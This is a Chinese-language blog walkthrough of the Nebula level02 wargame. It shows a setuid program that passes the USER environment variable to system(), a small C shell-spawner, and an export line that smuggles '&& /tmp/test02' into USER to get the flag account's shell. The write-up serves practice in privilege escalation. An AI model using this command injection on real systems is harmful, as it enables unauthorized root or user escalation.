Nebula level02

最新推荐文章于 2019-09-19 22:15:56 发布
最新推荐文章于 2019-09-19 22:15:56 发布
阅读量6.2k 收藏 1
点赞数
分类专栏: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youfuchen/article/details/8161031
版权

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02 . Files for this level can be found in /home/flag02.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
	char *buffer;

	gid_t gid;
	uid_t uid;

	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	buffer = NULL;

	asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
	printf("about to call system(\"%s\")\n", buffer);

	system(buffer);
}
这个题目其实很简单,突破点就在于getenv("USER")

我们可以通过上一节的代码:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
      setuid(0);
      setgid(0);
      execl("/bin/sh","sh",(char *)0)
      return 0;
}

生成的可执行文件来完成这个练习。

export  USER=“level02 &&  /tmp/test02”

这样运行可执行程序的时候就会返回一个flag02的shell,在上面运行getflag就可以打印出成功获取了权限。

深夜航船
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nebula-V3.3.0镜像资源包
01-23
nebula-V3.3.0镜像资源包,包含meta、storged及graphd对应的镜像,以及nebula-console文件
nebula
03-29
Nebula是便携式的,并且可以在Linux,OSX和Windows上运行。 (也:保持安静,但是我们有一个在iOS上运行的早期原型)。 它可以用于连接少量计算机,但也可以连接数万台计算机。 支持的架构 我们的映像支持多种架构...
i春秋 - Exploit-Exercises: Nebula - level02
无节操
02-25 1159
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?Source code#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/ty
Nebula_level02
yuansunxue的专栏
01-29 311
exploit-exercises Nebula: level02 In level02 Nebula challenge, we have the following source code #include #include #include #include #include int main(int argc, char **argv, ch
ExploitExercises_Nebula_Level02
小黑话不多
12-26 444
题目源代码: #include #include #include #include #include int main(int argc, char **argv, char **envp) { char *buffer; gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid
Exploit-Exercise之Nebula实践(四)
Yale的博客
01-13 473
获取15关卡的flag。 由题目的提示可知,这题需要用到strace,使用strace观察flag15的调用情况。 直接strace跟踪flag15 结果如下: 可以看到(图中受限于屏幕空间没有截全),flag15大量调用libc.so.6 再使用readelf查看 结果如下 可以看到程序对libc.so.6存在依赖,可题目没有提供。我们需要写libc.so.6到哪个路径,让.so...
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1508
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
eclipse nebula部件
12-31
Eclipse Nebula是一个开源项目,它为Eclipse平台提供了丰富的自定义 SWT(Standard Widget Toolkit)控件和用户界面组件。Nebula的目标是扩展Eclipse的内置功能,使其能够支持更多高级、美观且功能强大的界面元素,...
Nebula
03-09
执照Nebula13的代码已获得,可以在找到完整的代码。 git作者日期在1420675200 +0000 (2015/01/08 00:00 GMT)之前的代码已根据GNU通用公共许可证版本3获得许可,该版本可在找到完整内容。 假定作者日期在1420675200...
nebula-graph-studio-3.8.0 ARM架构编译完成的包
最新发布
12-19
Nebula Graph Studio 3.8.0 在 ARM 架构下的编译与应用》 在当前数字化时代,图数据库作为一种高效的数据管理工具,正逐渐受到广泛关注。Nebula Graph,作为一款高性能、分布式、易扩展的图数据库,其图形化管理...
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
ExploitExercises_Nebula_Level08
小黑话不多
12-28 447
题目提供了一个capture.pcap文件: 可以看到password部分输入,其中包括几处0x7F,查询ascii表,该值对应删除操作。 还原删除过程,最终得到密码:bacjd00Rmate su - flag08尝试登陆,成功。
渗透测试攻防练习实验室 (资源分享,国外在线教程)
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
i春秋_真的很简单_过程记录(坑吐了。。。)
等风来
09-19 9687
0x01 打开实验环境,根据提示打开实验工具dedeCMS (坑一) 等等,我的工具呢???在实验环境里提供的工具中有个dedecms5.7但是不好用啊 WTF??? 实在不行去网上搜了下攻略,发现要自己下载dedecms,一点提示都没有,,,好坑啊 如图,得到网站管理员账号密码 后面的明显是md5加密后的密码,不过数了数只有20位,百度后得知dedecms的特点就是这样 在线破...
i春秋 - Exploit-Exercises: Nebula - level03
无节操
02-25 1918
AboutCheck the home directory of flag03 and take note of the files there.There is a crontab that is called every couple of minutes.思路先进flag文件夹看看cd /home/flag03 vim writable.sh#!/bin/shfor i in /home/fl
Hydra dvwa brute force使用小记
热门推荐
无心插柳
08-14 2万+
详细分解Hydra用于测试 DVWA Brute Force模块, 清晰解析了如何使用Hydra来进行http的暴力美学破解
sqlmap dvwa SQL Injection使用小记
无心插柳
10-29 9531
sqlmap初步使用,测试环境为dvwa
Openssl 漏洞POC学习
无心插柳
04-09 7635
Openssl 漏洞POC学习
Nebula level10
无心插柳
05-13 7632
http://exploit-exercises.com/nebula/level10 About The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call. T

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值